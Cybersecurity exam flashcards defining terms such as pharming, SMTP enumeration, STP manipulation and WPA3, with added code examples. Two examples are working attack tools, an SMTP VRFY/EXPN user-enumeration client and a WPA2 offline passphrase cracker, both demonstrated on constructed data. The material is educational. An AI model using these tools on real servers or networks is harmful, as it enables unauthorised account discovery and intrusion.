Deck E Prt. 2 Flashcards
Operational Threat Intelligence
Is the data collected from sources such as humans, social media, and chat rooms, as well as from real-world events that resulted in cyberattacks. In this process the analyst prepares a report that includes identified malicious activities, recommended courses of action, and warnings of emerging attacks.
Operational Threat Intelligence
Is obtained by analyzing human behavior, threat groups, and so on. This information helps in predicting future attacks and thus enhances incident response plans and mitigation strategies as required. Operational threat intelligence is generally delivered as a report containing identified malicious activities, recommended courses of action, and warnings of emerging attacks.
Operational Threat Intelligence
Is about uncovering specific incoming attacks before they happen. Most operational threat intelligence comes from closed sources, although some threat actors discuss their plans on social media or in public chat rooms. It provides information about specific threats against the organization.
PCI-DSS
Stands for Payment Card Industry Data Security Standard. It is the security standard applicable to any organization that stores, processes, or transmits cardholder data, including credit card companies, merchants, and payment processors.
PGP
Is used for securing email messages. PGP (Pretty Good Privacy) is encryption software; its message format is standardized as OpenPGP, of which GnuPG (GPG) is the free implementation. It uses both symmetric key cryptography (a random session key encrypts the message body, which is fast) and asymmetric key cryptography (the recipient's public key encrypts that session key, which gives secure key exchange).
Pharming
Uses malicious code on the victim's host (for example a modified hosts file) or a poisoned DNS cache to redirect users' web traffic to fake websites without any click on their part. Once redirected, users are prompted to enter personal information, which is then used to commit identity theft or financial fraud.
Phishing Attack
Tricks the victim into opening a fraudulent email and clicking a malicious link or attachment. This results in the malicious attachment being downloaded and its payload executed; in the fileless variant the payload injects itself into legitimate software already on the system instead of writing a new executable to disk.
Preparation Phase
In the incident handling process, the preparation phase is responsible for defining rules (policies and procedures), assembling and training the human workforce (the incident response team), creating a backup plan, and testing the plans for an organization.
Promiscuous Mode
Is the configuration that allows a wired or wireless network interface controller (NIC) to pass all the traffic it receives to the CPU (central processing unit), rather than passing only the frames the controller is intended to receive (those addressed to its own MAC address, broadcast frames, and subscribed multicast groups). Packet sniffers rely on it, so a NIC entering promiscuous mode is worth detecting on hosts that should not be sniffing.
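Added example (not part of this deck): on Linux the kernel exposes the promiscuous flag in two places, the `flags` file under `/sys/class/net/<iface>/` (a hex value in which IFF_PROMISC is bit 0x100) and the kernel log, which records every transition in or out of promiscuous mode. The Python below checks both; the dmesg lines are constructed for the demonstration, and the function names are the author's own.

```python
import os
import re

IFF_PROMISC = 0x100   # bit value from <linux/if.h>; /sys/class/net/<iface>/flags is a hex string

# Both kernel log formats: older "device eth0 entered promiscuous mode",
# newer (6.x) "eth0: entered promiscuous mode"
_PROMISC_MSG = re.compile(r"(?:device )?(\S+?):? (entered|left) promiscuous mode")


def promisc_from_flags(flags_text: str) -> bool:
    """Decode a sysfs flags value such as '0x1103' and report whether IFF_PROMISC is set."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)


def promiscuous_interfaces(sysfs_net: str = "/sys/class/net"):
    """Live check: names of interfaces whose flags currently carry IFF_PROMISC (Linux only)."""
    found = []
    if not os.path.isdir(sysfs_net):
        return found
    for iface in sorted(os.listdir(sysfs_net)):
        try:
            with open(os.path.join(sysfs_net, iface, "flags")) as fh:
                if promisc_from_flags(fh.read()):
                    found.append(iface)
        except OSError:
            continue   # interface vanished or no permission; skip it
    return found


def promisc_state_from_log(lines):
    """Replay kernel log lines in order and return the interfaces still in promiscuous mode."""
    state = set()
    for line in lines:
        m = _PROMISC_MSG.search(line)
        if not m:
            continue
        iface, action = m.group(1), m.group(2)
        if action == "entered":
            state.add(iface)
        else:
            state.discard(iface)
    return state


# Constructed sample of dmesg output (not captured from a real host)
SAMPLE_DMESG = [
    "[   12.345678] device eth0 entered promiscuous mode",
    "[   40.000000] eth1: entered promiscuous mode",
    "[   55.000000] device eth0 left promiscuous mode",
    "[   60.000000] eth1: link becomes ready",
]


if __name__ == "__main__":
    print("from log:", promisc_state_from_log(SAMPLE_DMESG))
    print("live:", promiscuous_interfaces())
```

The log replay is what a SIEM rule would do with syslog-forwarded kernel messages; the sysfs check is the on-host verification (`ip -d link show` reports the same flag as PROMISC).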
Public Key Cryptography
Examples of protocols and tools built on public key cryptography are PGP (Pretty Good Privacy), SSL/TLS (Secure Sockets Layer / Transport Layer Security), and IKE (Internet Key Exchange, used by IPsec).
SMTP Enumeration
In SMTP enumeration, two built-in SMTP commands are abused: VRFY, which asks the server to confirm that a given user or email address is valid, and EXPN, which expands an alias or mailing list into its member addresses. A 250 reply confirms the name, 550 rejects it, and 252 means the server will accept mail but refuses to confirm (the safe setting); when both commands are disabled, RCPT TO responses can be used the same way.
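Added example (not part of this deck): a small Python client that performs the VRFY/EXPN enumeration described above, run against a constructed fake SMTP server started in-process so the whole thing works offline. The user names, the `staff` alias, the host names and the reply texts are all made up for the demonstration; the reply codes are the standard ones.

```python
import socket
import socketserver
import threading

# Constructed data for the fake MTA: local accounts and one expandable alias.
FAKE_USERS = {"root", "postmaster", "alice"}
FAKE_ALIASES = {"staff": ["alice@example.com", "bob@example.com"]}


class FakeSMTPHandler(socketserver.StreamRequestHandler):
    """Minimal responder that honours VRFY/EXPN the way a misconfigured MTA would."""

    def handle(self):
        self.wfile.write(b"220 mail.example.com ESMTP\r\n")
        for raw in self.rfile:
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                self.wfile.write(b"250 mail.example.com\r\n")
            elif verb == "VRFY":
                local = arg.split("@")[0]
                if local in FAKE_USERS:
                    self.wfile.write(f"250 {local} <{local}@example.com>\r\n".encode())
                else:
                    self.wfile.write(b"550 5.1.1 User unknown\r\n")
            elif verb == "EXPN":
                members = FAKE_ALIASES.get(arg)
                if members:   # multi-line reply: "250-" continues, "250 " ends
                    for m in members[:-1]:
                        self.wfile.write(f"250-{m}\r\n".encode())
                    self.wfile.write(f"250 {members[-1]}\r\n".encode())
                else:
                    self.wfile.write(b"550 5.1.1 List unknown\r\n")
            elif verb == "QUIT":
                self.wfile.write(b"221 Bye\r\n")
                return
            else:
                self.wfile.write(b"502 5.5.2 Command not implemented\r\n")


def _read_reply(sock_file):
    """Read one (possibly multi-line) SMTP reply; return (code, [text lines])."""
    lines = []
    while True:
        raw = sock_file.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        text = raw.decode(errors="replace").rstrip("\r\n")
        lines.append(text[4:])
        if len(text) < 4 or text[3] != "-":
            return int(text[:3]), lines


def smtp_enumerate(host, port, users, aliases):
    """Probe candidate users with VRFY and candidate lists with EXPN."""
    found = {"valid_users": [], "aliases": {}}
    with socket.create_connection((host, port), timeout=5) as s:
        f = s.makefile("rb")
        _read_reply(f)                      # banner
        s.sendall(b"EHLO probe.example.net\r\n")
        _read_reply(f)
        for u in users:
            s.sendall(f"VRFY {u}\r\n".encode())
            code, _ = _read_reply(f)
            # 250/251 confirm the user; 252 is inconclusive; 550 means unknown
            if code in (250, 251):
                found["valid_users"].append(u)
        for a in aliases:
            s.sendall(f"EXPN {a}\r\n".encode())
            code, lines = _read_reply(f)
            if code == 250:
                found["aliases"][a] = lines
        s.sendall(b"QUIT\r\n")
    return found


def start_fake_server():
    """Bind the constructed MTA to an ephemeral loopback port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSMTPHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def demo():
    srv, port = start_fake_server()
    try:
        return smtp_enumerate("127.0.0.1", port,
                              ["root", "alice", "nobody"], ["staff", "devs"])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

Against a real target, point `smtp_enumerate` at port 25 with a wordlist of common account names; the fix on the server side is to disable VRFY/EXPN (Postfix `disable_vrfy_command = yes`, Sendmail `PrivacyOptions=goaway`).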
STP Manipulation Attack
Is an attack in which the attacker's host sends crafted BPDUs (Bridge Protocol Data Units) advertising a lower bridge priority than the real root bridge, so the switches elect the attacker as the new root and recompute the spanning tree through it. After launching the STP manipulation attack, the attacker creates a SPAN (port mirroring) entry on the spoofed root bridge and redirects the traffic to his computer. BPDU Guard and Root Guard on access ports are the usual defenses.
Scareware Attack
A scareware attack tries to scare the user with something that is a hoax. A typical case is a pop-up stating "This computer may have been infected with spyware. Click here to install an anti-spyware tool to resolve this issue." The offered "tool" is the malware.
Spearphone Attack
Exploits the phone's hardware so the attacker can monitor loudspeaker output from data sources such as voice assistants, multimedia messages, and audio files, using a malicious app to breach speech privacy. The Spearphone attack does this through the motion sensor (accelerometer), which a malicious app can typically read without requesting any permission, capturing the speech reverberations generated by the loudspeaker.
Split DNS
Is a DNS configuration in which the organization has one DNS server in a DMZ (demilitarized zone) and a second DNS server on the internal network. The external server answers only with public records; the internal server holds the internal records (private addresses and hosts that are never published) and forwards queries for everything else outward. A split DNS infrastructure is the solution to the problem of using the same domain name for internally and externally accessible resources.
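Added example (not part of this deck): a BIND configuration for the two-server layout described above, using the documentation prefix 203.0.113.0/24 for the public side and 10.0.0.0/8 internally. The zone names, host names, addresses and file paths are hypothetical.

```conf
; ---- DMZ server (203.0.113.10), named.conf: authoritative for the public view only ----
options {
    directory "/var/named";
    allow-query { any; };
    allow-recursion { 10.0.0.0/8; };        // recursion only for the internal resolver that forwards to us
};
zone "example.com" { type master; file "external/db.example.com"; };

; external/db.example.com: only public addresses, only hosts that must be reachable from outside
$TTL 3600
@       IN SOA  ns1.example.com. hostmaster.example.com. ( 2024010101 3600 900 1209600 300 )
        IN NS   ns1.example.com.
        IN MX 10 mail.example.com.
ns1     IN A    203.0.113.10
www     IN A    203.0.113.20
mail    IN A    203.0.113.25

; ---- internal server (10.0.0.53), named.conf: internal zone, everything else forwarded ----
options {
    directory "/var/named";
    allow-query { 10.0.0.0/8; };           // never reachable from the Internet
    recursion yes;
    forwarders { 203.0.113.10; };
    forward only;
};
zone "example.com" { type master; file "internal/db.example.com"; };

; internal/db.example.com: same names, RFC 1918 addresses, plus internal-only hosts
$TTL 3600
@       IN SOA  ns-int.example.com. hostmaster.example.com. ( 2024010101 3600 900 1209600 300 )
        IN NS   ns-int.example.com.
        IN MX 10 mail.example.com.
ns-int  IN A    10.0.0.53
www     IN A    10.0.1.20      ; internal clients reach the web server directly, not via the firewall NAT
mail    IN A    10.0.1.25
intranet   IN A 10.0.1.30      ; these two records must never appear in the external zone
fileserver IN A 10.0.1.40
```

Check the split from both sides: `dig @10.0.0.53 www.example.com` should return 10.0.1.20 and `dig @203.0.113.10 www.example.com` should return 203.0.113.20, while `dig @203.0.113.10 intranet.example.com` must return NXDOMAIN. Leaking internal names into the external zone is the classic misconfiguration that turns split DNS into a reconnaissance gift.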
Spoofed Session Flood Attack
Is a DDoS attack in which the attackers create fake or spoofed TCP sessions by sending multiple SYN, ACK, and RST or FIN packets, so that the traffic resembles complete, legitimate connections rather than a bare SYN flood. Because the packets look like normal handshakes and teardowns, this attack can bypass firewalls and other defenses that only watch for half-open connections.
Syhunt Hybrid
Syhunt Hybrid is a security scanner used to automate web application security testing and to guard the organization's web infrastructure against web application threats. The analyst can use the tool to detect XSS, directory traversal problems, fault injection, SQL injection, attempts to execute commands, and several other attacks.
TCPTrace
Is a free and open source tool used to analyze the capture files produced by several packet capture programs, such as tcpdump, WinDump, Wireshark, and EtherPeek. It reads TCP dump files and reports per-connection statistics (bytes and segments sent, retransmissions, round-trip times, window sizes, and throughput).
Test Automation
In security testing, test automation can accelerate benchmark tests and repeat them with a consistent test setup, but it cannot replace manual testing completely.
Trident
Is the chain of three iOS zero-day exploits used by the Pegasus spyware. It jailbreaks the target mobile device remotely so the spyware can take complete control of it, record audio, capture screenshots, and monitor all phone calls and SMS messages.
WPA3 Personal
Is a wireless security protocol that replaces WPA2-Personal's PSK (pre-shared key) authentication with SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange. Because every password guess requires a live exchange with the access point, and a captured SAE handshake reveals nothing that can be checked against a wordlist, it is resistant to offline dictionary attacks and also provides forward secrecy.
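Added example (not part of this deck): to make the contrast concrete, this Python code shows the weakness SAE removes. Under WPA2-Personal the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), the PTK is derived from the PMK plus values sent in the clear in the 4-way handshake, and the MIC on EAPOL message 2 can be recomputed for every candidate passphrase without touching the network. The "captured" handshake here is constructed from a known passphrase so the attack can be demonstrated offline; the EAPOL frame bytes are a stand-in, not a real frame.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK and the four values an eavesdropper sees in the 4-way handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (CCMP): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist):
    """Offline dictionary attack: each candidate is checked against the captured MIC, no AP needed."""
    for candidate in wordlist:
        pmk = wpa2_pmk(candidate, handshake["ssid"])
        ptk = wpa2_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                       handshake["anonce"], handshake["snonce"])
        kck = ptk[:16]   # first 128 bits of the PTK are the Key Confirmation Key
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol_zeroed"]), handshake["mic"]):
            return candidate
    return None


def build_constructed_handshake(true_passphrase: str = "correct horse", ssid: str = "CorpWiFi") -> dict:
    """Constructed 'capture' derived from a known passphrase (no real traffic involved)."""
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"anonce-demo").digest()
    snonce = hashlib.sha256(b"snonce-demo").digest()
    # Stand-in for EAPOL-Key message 2 with its 16-byte MIC field already zeroed.
    eapol_zeroed = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 100
    kck = wpa2_ptk(wpa2_pmk(true_passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol_zeroed": eapol_zeroed, "mic": eapol_mic(kck, eapol_zeroed)}


if __name__ == "__main__":
    hs = build_constructed_handshake()
    print(crack(hs, ["password", "letmein", "correct horse", "hunter2"]))
```

Everything `crack` needs (SSID, both MACs, both nonces, the EAPOL frame and its MIC) is visible to a passive listener, which is why a WPA2 handshake capture can be fed to a GPU wordlist attack. With SAE the commit and confirm messages are bound to a fresh scalar and element per exchange, so a candidate passphrase can only be tested by running a new exchange with the access point, which rate-limits the attacker to online guesses.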
Wardriving
Is the wireless reconnaissance technique in which attackers drive around, or sit in a parking lot, with a laptop, a wireless adapter, and scanning tools, with the intention of finding and mapping Wi-Fi networks, typically open or weakly secured access points they can use or attack later.
Web Of Trust
Is the decentralized trust model used by PGP, in which every user maintains a ring (keyring) of public keys and vouches for other users by signing their keys. A key is considered valid when enough keys the user already trusts have signed it, instead of being certified by a central certificate authority. Messages are still encrypted with the recipient's public key, and only the recipient can decrypt them with their private key.
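Added example (not part of this deck): the validity computation behind the web of trust, written in Python with the classic GnuPG defaults (one fully trusted signer or three marginally trusted signers makes a key valid, chains at most five hops long). The signatures are modelled as plain (signer, signed) pairs because the point is the trust graph, not the signature verification; the keyring, names and trust settings are constructed for the demonstration.

```python
from typing import Dict, List, Set, Tuple

# GnuPG's classic defaults (assumed here; tunable with --completes-needed, --marginals-needed, --max-cert-depth)
COMPLETES_NEEDED = 1
MARGINALS_NEEDED = 3
MAX_CERT_DEPTH = 5


def compute_validity(own_key: str, owner_trust: Dict[str, str],
                     signatures: List[Tuple[str, str]]) -> Set[str]:
    """Return the set of keys this user should treat as valid (really belonging to the named owner).

    owner_trust: key -> "full" | "marginal" | "none": how far the user trusts that key's OWNER
                 to certify other people's keys. The user's own key counts as fully trusted.
    signatures:  (signer_key, signed_key) certification signatures found on the keyring.
    A signature only carries weight if the signer's key is itself already valid. Each pass of
    the loop extends certification chains by one hop, so MAX_CERT_DEPTH passes bound the path
    length from the user's own key.
    """
    valid = {own_key}
    for _ in range(MAX_CERT_DEPTH):
        newly_valid = set()
        for key in {signed for _, signed in signatures} - valid:
            full = marginal = 0
            for signer, signed in signatures:
                if signed != key or signer not in valid:
                    continue
                trust = "full" if signer == own_key else owner_trust.get(signer, "none")
                full += trust == "full"
                marginal += trust == "marginal"
            if full >= COMPLETES_NEEDED or marginal >= MARGINALS_NEEDED:
                newly_valid.add(key)
        if not newly_valid:
            break
        valid |= newly_valid
    return valid


# Constructed keyring as seen from Alice: her owner-trust settings and who signed whom.
OWNER_TRUST = {"bob": "full", "carol": "marginal", "dave": "marginal", "erin": "marginal"}
SIGNATURES = [
    ("alice", "bob"), ("alice", "carol"), ("alice", "dave"), ("alice", "erin"),  # Alice checked these in person
    ("bob", "frank"),                                            # one fully trusted signer is enough
    ("carol", "grace"), ("dave", "grace"), ("erin", "grace"),    # three marginal signers add up
    ("carol", "heidi"), ("dave", "heidi"),                       # only two marginal signers: not enough
    ("frank", "ivan"),                                           # frank is valid but has no owner trust
]


def demo() -> Set[str]:
    return compute_validity("alice", OWNER_TRUST, SIGNATURES)


if __name__ == "__main__":
    print(sorted(demo()))
```

Two things the example makes visible that the definition does not: a signature from a key you have not validated is worthless, however many there are (ivan), and owner trust is a separate decision from validity (frank's key is valid, but Alice has not said she trusts Frank's judgement, so his signatures count for nothing).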
Worm
Is a type of malware that replicates itself and spreads from one system to another, or from one network to another, on its own, without attaching to a host program or waiting for a user to run it, and causes similar types of damage to infected systems as viruses do.